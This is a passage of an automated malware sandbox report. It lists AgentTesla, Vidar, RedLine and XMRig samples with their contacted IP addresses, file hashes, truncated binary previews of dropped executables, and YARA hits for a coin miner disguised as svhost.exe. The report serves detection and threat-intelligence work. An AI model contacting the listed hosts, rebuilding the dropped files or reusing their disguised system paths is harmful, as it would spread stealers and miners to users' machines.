                                                                                                                                                                                                  Royalistic.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  e-dekont-20230316B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76

                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  TELEGRAMRUpdf_novichki.rarGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  installer.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  setup.exeGet hashmaliciousClipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  2.bin.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  7rSoC1BfML.exeGet hashmaliciousAmadey, Nymaim, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  cracksetup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                  WEBNXUSmain.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  Purchase_Order-0823636.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  V9hBN9tW4H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  DISCOUNT_PRICES.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  4EJ3mCLR01kwHtR.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  PURCHASE_CONTRACT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76
                                                                                                                                                                                                  Royalistic.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 64.185.227.155
                                                                                                                                                                                                  e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  e-dekont-20230316B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 173.231.16.76

                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0e0E0BD47371B5E50FC51F147DC456949F8DB70EC27B644.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  setup.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  315B63093AE9218EBDEAEB5120E17D7FA81BC7BAE694F.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  Purchase_Order-0823636.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  V9hBN9tW4H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  FdxNaIcQo2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  Remittance.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  Product_Inquiry_#03_2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  3-20177 WinRAR_6.1.2_IIS (1).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  ccdc 5b contract explained 17361.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  DISCOUNT_PRICES.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130
                                                                                                                                                                                                  New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                  • 140.82.121.3
                                                                                                                                                                                                  • 104.237.62.211
                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                  • 198.251.88.130

                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeSetup.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                                                                                    g3uCvGEu6T.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                      eZazqsQj35.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                        3dHdV0ogNv.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                          Lj1WJuaKRz.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                            qYg5340gEj.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                              f4cHARAN2d.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                sample31.exeGet hashmaliciousAmadey, XmrigBrowse
                                                                                                                                                                                                                  Mefolis.exeGet hashmaliciousRedLine, XmrigBrowse

                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                    C:\ProgramData\MicrosoftSystemCache\clib.bin

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\ProgramData\RuntimeBrokerData\RegSvc.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1904
                                                                                                                                                                                                                    Entropy (8bit):6.026358237126419
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:e/1cqvurjwu2uNtmRuxh0M2pMoE8Vjcp4D77XURG1BZJrM5i:eTcIuNbb0ZpM4D7OG11M5i
                                                                                                                                                                                                                    MD5:429780A397E429FCA432914867ED1CDC
                                                                                                                                                                                                                    SHA1:0BE35D51901BEE31664CBA07D643055E007D4D22
                                                                                                                                                                                                                    SHA-256:74F2DD790ED25DF1BCA9B0071D51D03BB118BD968612061219EBF3CE768BF67C
                                                                                                                                                                                                                    SHA-512:36DC70A756D3F38243E7DDC9AB387E607C419E769F7BFD7AB0FDC60E555B2174FE0C2CAB2F9F74A160FCD24E95AC62930AD5000715AAD2FF90EAB76FD5361A44
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:P2YPPhDz2KgW0IVwLRnW4qt3YuF6x8NZ5xoXmqmz37FCoxjTHWkt+X3+y2oVWO04wLu5EhroPNIzgcjocysWxC3R4RYw3AoWtHLuHtRwr9Ph2lOJO/3iQ5XHPgFJA78H1eNdfbDu6wCPXQse9EPll90YNDJ8crZ3BASPTapcn80vo34lxgXydo0=..GrbpRTtne0IhO3CfL0pztj/WolibZidFhI+u9T/g7MWgnAplx87A9nyGZwJSZuvFUh3EgbzP/8hArtvEHY37f7MeWLDqg7FsOUlCs1ZlzP23UTZ1RemyYnROaDZUTYNf0R8nP4z7uoLtuydhMibd0LfUqgkpiTJs5p9e5dMhkjbkmFmqlnxQz1I=..N6XCeEdl9HDadAeTv8qCG8X5sxfVzinG2elN7Xl3RAWbKJ/Ch4L4H+hG56JWby3uk7aYqdDSdoQHCCRsderJvz3TZMPH1f3LEHivhE1xCIWKn8QD6SQsAQXNY/543dduSeNCnniFm8LUkTCLshLYJyToVtNA+8H2b5MJFjzqTXEsb0U16cFVQ1I=..RhSnZTLVfydTWog1a6UAy9nkDPUkAmhdXIzDitiGNsUoT84yyxEWOpfY6QFQkHpM9LpzclftvuzWf0UsjRMm6xK4LB5R2G/faa2D95nAAE5xoO5ONN9X/xNjYcjE2GKHwz7N6Hml496JXt7SN4MiUHK5FfcybKQETJM44PFiv2dtAYM+XQoIURc=..W9h1WsdZtRbTm+5qrKodGvUxMbCWotRQGLtUsyCo/ydg5wvQzLR5Y+QzsY3pWc3DPru1y5Dbf1IGlF/hnZ7TdOWnXSvaerRfQQqjE26ByT5kGEhs59/PibkZir3cACuh57Jm2ye2ZWANmjj4NBvj5dmPOd8UyZDPqFxgZ/xr4VL0qG+gkEjj0u4=..ubvyG4W8YbIKOpv1itsiGVW9EzUEamCyM6rU5KEZZdac/zXp4WSNWjFNu3xv6no96lusaS

                                                                                                                                                                                                                    C:\ProgramData\MicrosoftSystemCache\mib.bin

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):916
                                                                                                                                                                                                                    Entropy (8bit):6.006091656254043
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                                                                                                                    MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                                                                                                                    SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                                                                                                                    SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                                                                                                                    SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..

                                                                                                                                                                                                                    C:\ProgramData\RuntimeBrokerData\RegSvc.exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):88064
                                                                                                                                                                                                                    Entropy (8bit):6.229523170202207
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:bJYuREHvD7cJ/kXCUJaOXIz8o+ZdH+Qij6Tiz:lrRyJwQo+ZdH+hj6mz
                                                                                                                                                                                                                    MD5:BFD02E7E401667B6C5853FE0FBEC26E7
                                                                                                                                                                                                                    SHA1:F257EBD2D6975C8B98536D3CA46A188BD50CBD09
                                                                                                                                                                                                                    SHA-256:030EC5352DE04F4773F5EB701E1506D3A97B948BC8BB9CF817F479D5A4E765DA
                                                                                                                                                                                                                    SHA-512:DB355DE9D1AA0C2DD5459253214F8634EA932D213706608827174B311DF718BFD5378898C4D3B4CEC0CCDCD0F90517931B5F977898DC9AD0B56E775C7B9F96A3
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}..........."...0..>...........\... ...`....@.. ....................................`..................................\..O....`..............................T\............................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............V..............@..B.................\......H..........................p...........................................~.L..sl.!.A.&.AI.F*.j..c......S...y.....D/..c&........'.<L..n!.\N....)........JR.=.0X..).....qx.Y,~o......k.....Tk0...[..D}.PK...3...........<.%1:<-....|.S.O.-.-9y......pN3|..@...B'....b.n........R.6h.o+..YM.UJ.........MUu5.aO.....5...#.\.t. ~B...q1..U...;~'._s...;8.g..2*..!.F..1....r.E..k(.\...@>sK.C...%....hu.....6Z..).;..x+.....j.z'.S.G.u....T.L@.{.4.5..k...K.$g4.u.o&D7Q..#..N..F4"...

                                                                                                                                                                                                                    C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):154112
                                                                                                                                                                                                                    Entropy (8bit):6.466751742009968
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3072:F5biAfx1p7t+KJPF0+yxqbl8MBRnZgRKByWu:F5biAfx1l6vxqbqMBRnZgRKBy
                                                                                                                                                                                                                    MD5:DC68A4B4746C67F3D28C9FD958E8EA05
                                                                                                                                                                                                                    SHA1:4E3C8AB2D91FD9831731483B192FFAED142430A3
                                                                                                                                                                                                                    SHA-256:A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
                                                                                                                                                                                                                    SHA-512:4E6D94C3AE09B567EF76BAA392C1E6E0F12615F46CCB9A2116DB7B4B2D304C03E510BAACA03738F540A4E85A0310D69B57A884B98AFCAA8D62E0A3C90F32E832
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: g3uCvGEu6T.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: eZazqsQj35.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: 3dHdV0ogNv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: Lj1WJuaKRz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: qYg5340gEj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: f4cHARAN2d.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: sample31.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: Mefolis.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%/..........."...0..N...........l... ........@.. ....................................`.................................Tl..W....................................l............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B.................l......H.......\o...............m..p............................................se7..%.f.fU..h...=k.);....jhE..^.6....W0/.,.CqM..8..]LB..(..$.$...8.Z..IXW.a.a....Q...M......92*.<.V..8Zc.z.5.E.&.x.o.,>..JV.o.....mctp..39../~h.....ca....o>../x...b..4.-YP....R......} .G....*>..M..e..C"d.GL..$.=...}.w.l.9.G.n.a/...t..y)..}<k.!)g...Y.y@K.'4..\u....%i.e...I.......5.z.w.RM....h.j..8|}W#d.........1%U.hbU.=-p.?..Bxz...)..u..Y=F....m...?...s%.k.7[..z.}..9X......Iu...5...la

                                                                                                                                                                                                                    C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):14544
                                                                                                                                                                                                                    Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\RuntimeBrokerData\svhost.exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8294400
                                                                                                                                                                                                                    Entropy (8bit):6.635462046124321
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:98304:GeSdMeEZvlEVuaMYPShvXAaiW5DjocFtZLj2XMSpZVqWyOmsqndFt3BQgEBHQ+zJ:NflEiI9Wt3YLkqpnmNK/ysxfWdIjF
                                                                                                                                                                                                                    MD5:B38D28CCCACAC85A62AEF15D993449DD
                                                                                                                                                                                                                    SHA1:F65D87F2185AD06E1057842B49C2E9F897D37CF9
                                                                                                                                                                                                                    SHA-256:DA528001CA247AABB5D6ED30187E3F85661663C3B00B3BC85A932CD2066251BB
                                                                                                                                                                                                                    SHA-512:836C6F59EEA640A9355AD7066A2F810437C7CAA6D429575F66245D756B0058AA43976478FF2000366D034BC1D2E2E256927E82F0EEB738E795DB62393C130620
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                    • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Florian Roth (Nextron Systems)
                                                                                                                                                                                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Florian Roth (Nextron Systems)
                                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: Joe Security
                                                                                                                                                                                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: ditekSHen
